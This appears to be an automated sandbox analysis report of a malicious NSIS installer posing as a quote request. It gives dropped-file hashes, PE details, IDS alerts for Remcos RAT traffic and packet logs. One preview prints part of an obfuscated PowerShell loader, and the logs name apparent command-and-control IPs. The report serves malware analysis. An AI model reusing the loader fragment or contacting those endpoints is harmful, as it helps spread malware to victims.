                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                    Malicious:false
                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                    Process:C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe
                                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0x9cdd386c, page size 32768, DirtyShutdown, Windows version 10.0
                                                    Category:dropped
                                                    Size (bytes):15728640
                                                    Entropy (8bit):0.1010164436272026
                                                    Encrypted:false
                                                    SSDEEP:1536:uSB2jpSB2jFSjlK/Qw/ZweshzbOlqVqdesWzbYFIeszO/Z5eHW5d:ua6a2UueqkzYRzOW
                                                    MD5:249FEB833BF1C58EFC76A82D24633D3B
                                                    SHA1:B4AA9A3B2DDC9A6EF5475A8FAACDE445423CECDD
                                                    SHA-256:8E7F0BEC4C74B7BE40E4D00DDFBD99FE7FE7D20968BA56F829DEA9444B29B632
                                                    SHA-512:84206F5C7EDF45E822A8D269371D54508F33C21000E006084EA38686688EF47F8D5B2A6E018D8D3C9A01BAD2B850161B521CA2E90D83A342F7A09FC65A291F26
                                                    Malicious:false
                                                    Preview:..8l... ...................':...{........................P......"...{#.'"...{..h.R.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{..................................xX.t'"...{...................G1.'"...{...........................#......h.R.....................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                    Category:dropped
                                                    Size (bytes):1244223
                                                    Entropy (8bit):7.307107160913755
                                                    Encrypted:false
                                                    SSDEEP:24576:veZnxqTKr6Suh2q1R+1ixZdZm5efPMM6+D1gH3R:veZaKuEAXd7UM6cUR
                                                    MD5:71A5C22358684EA0359D9E20C12CBFD0
                                                    SHA1:904946890793B72889B04A8D85D7427CBB374EDE
                                                    SHA-256:9D64923557FD189C8F045DB5F7EBDF23CA6AFE0ED48D4B5A9F9398548EF848F8
                                                    SHA-512:E5CDFEABC6B857D68DF3A3F730EBB998F74E8D528EE90E96965DCB08590350DA1E5F5C3F25CC012CE836517B415120038AC728B3C5327C48F101AF7F17655DD2
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..P...P...P..*_...P...P..OP..*_...P..s...P...V...P..Rich.P..........PE..L....z.W.................`...*......j2.......p....@..........................@............@..................................u..........H............................................................................p...............................text...._.......`.................. ..`.rdata.......p.......d..............@..@.data................x..............@....ndata...................................rsrc...H............~..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):26
                                                    Entropy (8bit):3.95006375643621
                                                    Encrypted:false
                                                    SSDEEP:3:ggPYV:rPYV
                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                    Malicious:true
                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                    Process:C:\Users\user\AppData\Local\Temp\lftebevgelserne.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                    Category:dropped
                                                    Size (bytes):2
                                                    Entropy (8bit):1.0
                                                    Encrypted:false
                                                    SSDEEP:3:Qn:Qn
                                                    MD5:F3B25701FE362EC84616A93A45CE9998
                                                    SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                    SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                    SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                    Malicious:false
                                                    Preview:..
                                                    Process:C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):140827
                                                    Entropy (8bit):4.941584044575412
                                                    Encrypted:false
                                                    SSDEEP:3072:S785VcjJ8joTNUiR50MkRpg4dx8EI3Z9cSeokeTTSRf7udM/:SKcjJLpfR50xpR0LM7u+/
                                                    MD5:564AC825609CE02F66EE01AB6EA7449D
                                                    SHA1:E751023A2B5BE88EC4536CB81A74E43262AE7C5D
                                                    SHA-256:A8295B6E7CDDF771E4BD981E075FD012585F16800A5D08175FE775E3D77CE529
                                                    SHA-512:B38957055EDE7D5289B3128F2A699E369DA8341EDDBCCD5A58AE3E2E369F74755FF81AC37D843616B8C031385DCC102D9D0287581B4720165F64DBC135F4B87E
                                                    Malicious:false
                                                    Preview:....u.....tp..3...i........../...............u.K......>....#.v........+..IP.'Y.....c@.....Q.Z..j../..........BX..r.....j..........u.........c.....&..Y..%..<n..L...JJ..~z...!......t.........................#.........,.&.....m....4...'.;..7.+.1...A....p.g.'.'.B|{.1.....+.&,..............r......s.....~....H. ....^....p..g.^.E.......u..".....^.T..Z``..,..............S.........._........t..........@4..DB....>..........G.~{.......).........@...M.....^.....L........-w...l..i..6.......S.[....:..~......g.......A.....%...1......P.....]...b..G......H...........y.-.....:...k.......=......V.........B.......(.wg..s..#.p3.........]..............(.C....jYL.... .....aY........;.......Iyt.............sU0...y.."N:^.l.l............L....d.O..........x..=.._..........[........... .$.......p.........6............0.............?............h....0W>...c.h..............E........H........g..s..............].....x......`.. .......F".R...{.....a....1..e'.......I......6.-..L...$........M.....(g.`...F..
                                                    Process:C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):290790
                                                    Entropy (8bit):4.929930740023215
                                                    Encrypted:false
                                                    SSDEEP:6144:FFIUzMFS1bbadMbOckFYQmiP74MEdj9nfWIxBo1goa:0oISxboKOXFYIadFu1ra
                                                    MD5:52B2EB2702A80B363E98A33DF62EE9B0
                                                    SHA1:3DEA0E0605C70BC009A6C845F0007C46E6E80139
                                                    SHA-256:40D182CFCA93AE21FAB96E028735BF7A0980C05FCF045D19EBA3E304BB355963
                                                    SHA-512:D92775ABDCB51F2C45D710D77683BC375CB014A15C606C462C9B2DF00115A8654B43D3DD9FBA9DB1290B314C317600F79511E0ACAAAF2B7C892DC9EA78E6979D
                                                    Malicious:false
                                                    Preview:......W.A................6..~.d.\.........................u#..............5~......../.X..................j...................R......M...V...c..G.._#..u...Y.x.|....u...lt...S.......|Q..........d.E......R.....c..............Gj.........]q.^.........l=qd.c.....%...v_......7A..............,......u.2......+....y...D.............P.j............................f.B.....1...{...D../...Oc.........FQ.....>...............5...........u...........m\w.<....f.#......U.,...........c.Y....8...........-.]...........................................+.r.................y..........-...................M...\...e......(k)P.N..............&......0..5......E..6........{.....)....k1.......H....Ln...>....w....Z.~R.T...........................O.O.Yl.........[.g......i...g.............I.......x................N`....%M...........j......!..".......*..=...#.N......O.....0.T..R....k......i.........7..G.............;...s.J.....E.f............*.......L...........@......2..N._X....]I..s.....h..#)..{...%{.9..UWT.o..
                                                    Process:C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe
                                                    File Type:ASCII text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):335
                                                    Entropy (8bit):4.287740194979772
                                                    Encrypted:false
                                                    SSDEEP:6:iKcBiyl70Z/btpiNCDYQ/+Wnpi3AwOCFGjbyqJHoBA1rijNEH4:i7BimWjTzh/yX2bB11rixM4
                                                    MD5:C3335BFBC4EAEEF9766405CD7D965D6D
                                                    SHA1:624640F2CFD49CA0C06A614D64183CE929A32B0D
                                                    SHA-256:9D7A561D2E1D2AD5CFD77B8E625DEC793B51CA54FCC428F84915F0919754B4EA
                                                    SHA-512:1038A045AD5FA0727F741F94D86A48CAD652D46DD3E6E84C746B0776128C1BBCA19920C3D3461EF00F95B79DF80811AE1E0CAD256074EF4132E6DFFFDE40E68C
                                                    Malicious:false
                                                    Preview:preintercede filigranarbejde grimacers zoomastigina paahnger sprognvns.bankerotternes dyreavlen blakkens maximist oplysningskontorets,farmakologis speederen bestrbelses anderumper mutabel nonadjoining.drifternes rangiest autosensitization krankens minerer..tilbygningernes klageberettigelse udgiftsfordeling.trumph oxamide azimuthally,
                                                    Process:C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):411403
                                                    Entropy (8bit):4.945019908135326
                                                    Encrypted:false
                                                    SSDEEP:6144:CC3BAKNW04mXrOU0yegsmpEcgm4iVYHjsZrLFQUR58rsx8mTECSjqp4kLzJDhJhC:7xApkyQoRGCoZ758rjqECeOzzH2
                                                    MD5:612DAF43598211CC0761536989A38464
                                                    SHA1:1E178636D360372262CD2E0AED87F5D19C21C301
                                                    SHA-256:0108C27FA55566ECCA7A3F29F7B2F1C1C0EEC126C41B07231387C087BCC05215
                                                    SHA-512:E2205FC527D17CFBF2D3CCF3626EC80AA0D457C3426130392303B72EF3A0168232CA861B63DC94DE7BDFC632BE834718C93E0A211459D7A110FBCE0986225AEF
                                                    Malicious:false
                                                    Preview:...................l0pb}.....BB..@..Y.V..&....Q._...........d...................w..y!k.....p..Q......&....C.....................o......o$..........$..........K....#%.....d..6...#...a...r.....23..V`..............`.,.........n..................d..I....*....................t......*....,...d)...................9......J........v[v.C....<.....@i[...i........K....b...H.....M.............F..I..\M...L.........&)..T.n......o.......R....... .H.....[.........!....2.L.....J.......=..h.,...XL...b>..d.M........6i.............n..............F...W.Z.3...........u.....i3...!zs.............I.....;......h..c.........$}<........r.w.....oc............J............2z............ B..u..B...{.Z.........v.h...x.........d..i.@.............L...Q.y.;../.d-.............z..s...........q9...f.M.7......h..0.....].e...........&................N$...@T......pZ..b............+.kl..l.*........+V..........2.Z.........S..............w....S....G+aj..s.c2+.....W....A.;......._............?...wI....gR.:.m.3x....J..B...
                                                    Process:C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe
                                                    File Type:ASCII text, with very long lines (4151), with CRLF, LF line terminators
                                                    Category:dropped
                                                    Size (bytes):73691
                                                    Entropy (8bit):5.190823741119272
                                                    Encrypted:false
                                                    SSDEEP:1536:QwDUyWHLcSXjDoNITdNaEfyDk8uwBkk/E6Qnqg+hmG7J/+p:jDUyWrro4a2Ok8x863tmGK
                                                    MD5:E3E1008CC3249F7049DC4A7291632CB3
                                                    SHA1:40D972D10E48E71D9BC0D3F30F506F140F4E18FD
                                                    SHA-256:D80B3DD341FD5947DDBD3E38F671F2B264318399FE5ACFCCABEEAC81981E242A
                                                    SHA-512:CE8F7261887890A61CEA58420A3DFB33774F2750CA3E3C7B9C7F4F1EAB232544E281B67C47984BA0C5E2F4315C9BFBF08274E0B7DA4CCB50FC25588FEC369158
                                                    Malicious:false
                                                    Preview:$Vinduesopstningsfilen=$Fiddlebrained;..<#Tomfool Shamelessness Foedevarer Leucosyenite Lsmags Melodiseres Autostability #>..<#Askeonsdage Ferskvandsomraadets Hjulpiskernes Graveclothes Kretidseffekter Indkbsordrebekrftelse Filreferencen #>..<#Egnsbeskrivelser Vejkro Cleverality Antitrochanter #>..<#sexannulate Spiccato gobiiform Inextension Givtigstes Kuskite Intercorrelation #>..<#administrationsgrundlag overvlde Exergue tillgsstrafs #>..<#Unceasingly Intranetwork Emule bosch Shibah Jasper Blyforurening #>...$Medstuderende = @'.Gi fels.Misunde$vakk rhDTekn noeUnsectanFlet unt .ubbediAftersttB.lstediStrigeroCivilarnLy.phoc=Childli$MahmoudpStandareBottleor AtomrassupplikoUnreminn acensnePararecnNavlest;Produkt.StadsarfSup rzeuRummelsnSkaarlgcRoe,tget Cholemi RingmaoTo vidanFri age catagoV ecompeibjarkesrStrigerk Squaden granuli KamikhnUnprotegChiquiteDairymarBundobun nterfieUnd rdisSnkenee ,rodukt(Tele on$WowseriU garbodnFornjele indelsf aevogyfMargriteKopulatcbesaetnt Forto lIroniene
                                                    Process:C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):309954
                                                    Entropy (8bit):7.708526622891332
                                                    Encrypted:false
                                                    SSDEEP:6144:kBuuYZ/4JBsO7t5kGvVIQO8/9d0vpRiHRMidSxyKfEkMuJqhdyORLn6:kBuuYZQJBTdIu//0DMRMZnfEk5JqnBZ6
                                                    MD5:11237E18D598C8C55E562FAD04345225
                                                    SHA1:0D2F512BD0DBE5ECDD236C1E4CCCE4EBF8759DE3
                                                    SHA-256:63BD68B6A2FF50D2761D83C78BDCEEA068B7A1FD25557111A5E54BAFABB1B6B2
                                                    SHA-512:BA29CECE8378D2AE7649866D236DAF0890A423ACD3C9B113D8FDF09461A4C54E26F2A490900E2F6ECC73FE9D8E6E4DC247E1E5A15E004B803684682843E906AD
                                                    Malicious:false
                                                    Preview:...............{{{{..q.....33.__.w.6.))).............\\.....................M.o....777...c.....MM.....B..........................j.........[..................................>.........L......m....@......................G...#....00.........+++....................A.........LLLL......ZZZ..................VV...-...........N......................................g.*.......888.......................BBB......p......................B..../.H....WW........a......_..........EEE....\.....f........m.....mmmmm.....@.......5......>......"""...........SS. .............55.<<<<.$$$..........w....00...........................1111........ooo....F...........................vv..............``..............vvv..................I....00..................pp..........HH.....www............................__.........hhhh.....................&.4.....WW......)....r....ff.........BBBBBBB......(........zz....~~~~....#................o........................................r.......;.....vv...........).............rr
                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                    Entropy (8bit):7.307107160913755
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:Priority_Quote_Request_Items_List.exe
                                                    File size:1'244'223 bytes
                                                    MD5:71a5c22358684ea0359d9e20c12cbfd0
                                                    SHA1:904946890793b72889b04a8d85d7427cbb374ede
                                                    SHA256:9d64923557fd189c8f045db5f7ebdf23ca6afe0ed48d4b5a9f9398548ef848f8
                                                    SHA512:e5cdfeabc6b857d68df3a3f730ebb998f74e8d528ee90e96965dcb08590350da1e5f5c3f25cc012ce836517b415120038ac728b3c5327c48f101af7f17655dd2
                                                    SSDEEP:24576:veZnxqTKr6Suh2q1R+1ixZdZm5efPMM6+D1gH3R:veZaKuEAXd7UM6cUR
                                                    TLSH:6945F0DAD5A461DECCBD38F5400168B5D42B0CADD69960504CFE7E2725BAC8BCE38A4F
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...P...P...P..*_...P...P..OP..*_...P...s...P...V...P..Rich.P..........PE..L....z.W.................`...*......j2.......p....@
                                                    Icon Hash:8e16069733333386
                                                    Entrypoint:0x40326a
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x57017AAA [Sun Apr 3 20:18:50 2016 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:e2a592076b17ef8bfb48b7e03965a3fc
                                                    Instruction
                                                    sub esp, 000002D4h
                                                    push ebx
                                                    push esi
                                                    push edi
                                                    push 00000020h
                                                    pop edi
                                                    xor ebx, ebx
                                                    push 00008001h
                                                    mov dword ptr [esp+14h], ebx
                                                    mov dword ptr [esp+10h], 004092E0h
                                                    mov dword ptr [esp+1Ch], ebx
                                                    call dword ptr [004070B0h]
                                                    call dword ptr [004070ACh]
                                                    cmp ax, 00000006h
                                                    je 00007F6E28DCD553h
                                                    push ebx
                                                    call 00007F6E28DD0694h
                                                    cmp eax, ebx
                                                    je 00007F6E28DCD549h
                                                    push 00000C00h
                                                    call eax
                                                    mov esi, 004072B8h
                                                    push esi
                                                    call 00007F6E28DD060Eh
                                                    push esi
                                                    call dword ptr [0040715Ch]
                                                    lea esi, dword ptr [esi+eax+01h]
                                                    cmp byte ptr [esi], 00000000h
                                                    jne 00007F6E28DCD52Ch
                                                    push ebp
                                                    push 00000009h
                                                    call 00007F6E28DD0666h
                                                    push 00000007h
                                                    call 00007F6E28DD065Fh
                                                    mov dword ptr [00429204h], eax
                                                    call dword ptr [0040703Ch]
                                                    push ebx
                                                    call dword ptr [004072A4h]
                                                    mov dword ptr [004292B8h], eax
                                                    push ebx
                                                    lea eax, dword ptr [esp+34h]
                                                    push 000002B4h
                                                    push eax
                                                    push ebx
                                                    push 004206A8h
                                                    call dword ptr [00407188h]
                                                    push 004092C8h
                                                    push 00428200h
                                                    call 00007F6E28DD0248h
                                                    call dword ptr [004070A8h]
                                                    mov ebp, 00434000h
                                                    push eax
                                                    push ebp
                                                    call 00007F6E28DD0236h
                                                    push ebx
                                                    call dword ptr [00407174h]
                                                    add word ptr [eax], 0000h
                                                    Programming Language:
                                                    • [EXP] VC++ 6.0 SP5 build 8804
                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x75040xa0.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x480000x5b148.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b4.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x5ff90x6000b46cdd345517700b251a2cb55d7f9fffFalse0.6667073567708334data6.473673395752749IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0x70000x13a40x1400848ecd58951d0a4cfe8ec8cfce6b20d1False0.452734375data5.125569346027248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0x90000x202f80x6003953dbb7217e7539ee75e90871f7aef9False0.4947916666666667data3.9050018847265378IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .ndata0x2a0000x1e0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0x480000x5b1480x5b200f367d087b2fec37ef2b58fd051ca47e2False0.2890946502057613data4.352122236544265IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_ICON0x482f80x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.26088854040299436
                                                    RT_ICON0x8a3200x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.3380160889624985
                                                    RT_ICON0x9ab480x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.40245630609352856
                                                    RT_ICON0x9ed700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.42562240663900414
                                                    RT_ICON0xa13180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.4772514071294559
                                                    RT_ICON0xa23c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5939716312056738
                                                    RT_DIALOG0xa28280x100dataEnglishUnited States0.5234375
                                                    RT_DIALOG0xa29280x11cdataEnglishUnited States0.6056338028169014
                                                    RT_DIALOG0xa2a480xc4dataEnglishUnited States0.5918367346938775
                                                    RT_DIALOG0xa2b100x60dataEnglishUnited States0.7291666666666666
                                                    RT_GROUP_ICON0xa2b700x5adataEnglishUnited States0.7555555555555555
                                                    RT_VERSION0xa2bd00x234dataEnglishUnited States0.5088652482269503
                                                    RT_MANIFEST0xa2e080x340XML 1.0 document, ASCII text, with very long lines (832), with no line terminatorsEnglishUnited States0.5540865384615384
                                                    DLLImport
                                                    KERNEL32.dllSetCurrentDirectoryW, GetFileAttributesW, GetFullPathNameW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, MoveFileW, SetFileAttributesW, GetCurrentProcess, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, WaitForSingleObject, CopyFileW, CompareFileTime, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, lstrcpyW, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GlobalFree, GlobalAlloc, GetShortPathNameW, SearchPathW, lstrcmpiW, SetFileTime, CloseHandle, ExpandEnvironmentStringsW, lstrcmpW, GlobalUnlock, lstrcpynW, GetDiskFreeSpaceW, GetExitCodeProcess, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, lstrlenA, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                    USER32.dllGetSystemMenu, SetClassLongW, IsWindowEnabled, EnableMenuItem, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, wsprintfW, ScreenToClient, GetWindowRect, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, LoadImageW, SetTimer, SetWindowTextW, PostQuitMessage, ShowWindow, GetDlgItem, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, DrawTextW, EndPaint, CreateDialogParamW, SendMessageTimeoutW, SetForegroundWindow
                                                    GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                    SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                    ADVAPI32.dllRegDeleteKeyW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, RegOpenKeyExW, RegEnumValueW, RegDeleteValueW, RegCloseKey, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                    COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                    ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                    Language of compilation systemCountry where language is spokenMap
                                                    EnglishUnited States
                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-10-17T14:32:31.913370+02002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.849706TCP
                                                    2024-10-17T14:32:51.751300+02002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.858044TCP
                                                    2024-10-17T14:32:54.019722+02002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow14.245.163.56443192.168.2.858045TCP
                                                    2024-10-17T14:33:02.583961+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.858047185.150.191.1174609TCP
                                                    2024-10-17T14:33:03.626233+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.858048185.150.191.1174609TCP
                                                    2024-10-17T14:33:03.780099+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.858049178.237.33.5080TCP
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Oct 17, 2024 14:32:55.094835997 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:55.099981070 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:55.100168943 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:55.105808973 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:55.110712051 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:56.119632006 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:56.119668961 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:56.119680882 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:56.119826078 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:56.119842052 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:56.119856119 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:56.119899035 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:56.120070934 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:56.440072060 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:56.440087080 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:56.440098047 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:56.440110922 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:56.440130949 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:56.440152884 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:56.440198898 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:56.440804005 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:56.440814972 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:56.440825939 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:56.440861940 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:56.440884113 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:56.441241026 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:56.441252947 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:56.441306114 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:56.441328049 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:56.672137976 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:56.672162056 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:56.672173977 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:56.672213078 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:56.672245979 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:56.672292948 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:56.672322035 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:56.672373056 CEST5804680192.168.2.8103.72.57.120
                                                    Oct 17, 2024 14:32:56.672424078 CEST8058046103.72.57.120192.168.2.8
                                                    Oct 17, 2024 14:32:56.672435999 CEST8058046103.72.57.120192.168.2.8
